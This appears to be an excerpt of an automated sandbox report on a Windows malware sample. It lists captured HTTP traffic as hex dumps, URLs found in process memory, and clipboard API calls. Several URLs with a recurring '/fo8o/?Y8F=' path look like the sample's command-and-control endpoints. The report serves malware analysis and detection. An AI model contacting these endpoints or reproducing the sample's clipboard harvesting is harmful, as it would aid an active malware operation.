0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d 72 e7 56 1b fe be 01 61 fe 46 b3 9b c9 07 c9 cd ba 25 9b 75 0b eb 68 d6 a7 16 d3 55 ad 56 ea e3 c6 56 20 07 03 0c 9a 2a 78 ba bc c5 be d8 82 2f 80 10 e6 36 62 b3 f4 fc 30 02 7d 18 61 24 23 c7 86 01 a6 66 9d d0 b5 91 ce 4f 76 5a 1a 6b 63 ca 22 06 53 43 69 1f 63 f4 96 9a f5 c1 fc 5e 1d a5 f1 0b 27 7d 76 2b d5 db 41 33 de d5 86 8a 9f 90 05 e3 27 6c d5 07 fb ec 38 a1 ec c1 bc 05 b7 87 51 e4 7b 61 a6 69 ac b8 60 7e 5d 09 29 f5 07 a8 df f5 83 16 db 57 79 36 81 2c ad 08 9d f7 55 0b 96 ef 4b 97 cd 90 6a 33 ef 9f 6b 2e 6d cf 26 01 0f 17 86 18 c8 4e 07 06 6a b9 84 99 69 cc 11 29 6b dc 59 5b 3d df 09 ad 15 bb a7 ec 8d c6 42 87 83 c3 24 67 2f c8 fe 60 19 ad 5b a1 3f 0c 6c d5 c8 26 27 36 2e 35 7f 43 fd 09 7d a2 b8 52 72 96 a2 e4 4c d7 05 1f 3c 78 25 1d bf 2f 9d 9c d4 33 47 29 08 ad 1b 58 9e da b2 56 86 51 3f 93 6c 4a 6e aa a1 88 32 ec 67 32 2f 50 91 8d f5 48 a7 eb 35 42 28 c7 eb b4 30 ca c1 4b 8c ff 01 30 fc 37 de 11 c9 c7 f1 5e f2 69 72 53 c4 f7 33 16 38 5a 70 3c 44 38 6f 06 4e 07 81 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Jun 2024 12:58:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Jun 2024 12:58:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:58:57 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:58:57 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:58:59 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:59:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.00000000053C0000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000044E0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4479572760.0000000004F7F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.kasegitai.tokyo
Source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4479572760.0000000004F7F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.kasegitai.tokyo/fo8o/
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000005.00000002.4478683134.00000000048C2000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000039E2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000005.00000002.4478683134.00000000048C2000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000039E2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000004BE6000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003D06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://donnavariedades.com/fo8o?Y8F=l
Source: netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: netbtugc.exe, 00000005.00000002.4476837746.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000005.00000002.4476837746.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000005.00000002.4476837746.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000005.00000002.4476837746.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033B
Source: netbtugc.exe, 00000005.00000002.4476837746.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000005.00000002.4476837746.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000005.00000003.2362098065.0000000007BBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: netbtugc.exe, 00000005.00000002.4478683134.000000000427A000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.000000000339A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi
Source: netbtugc.exe, 00000005.00000002.4478683134.000000000427A000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.000000000339A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAs
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000004F0A000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.000000000402A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?Y8F=mxnR
Source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003208000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPF
Source: netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.000000000459E000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000036BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa
Source: netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.b301.space&reg_source=parking_auto
Source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000036BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.00000000053C0000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000044E0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_0084425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,

0_2_0084425A

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_00844458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00844458

Source: C:\Users\user\Desktop\Document TOP19928.exe

0_2_0084425A

Source: C:\Users\user\Desktop\Document TOP19928.exe

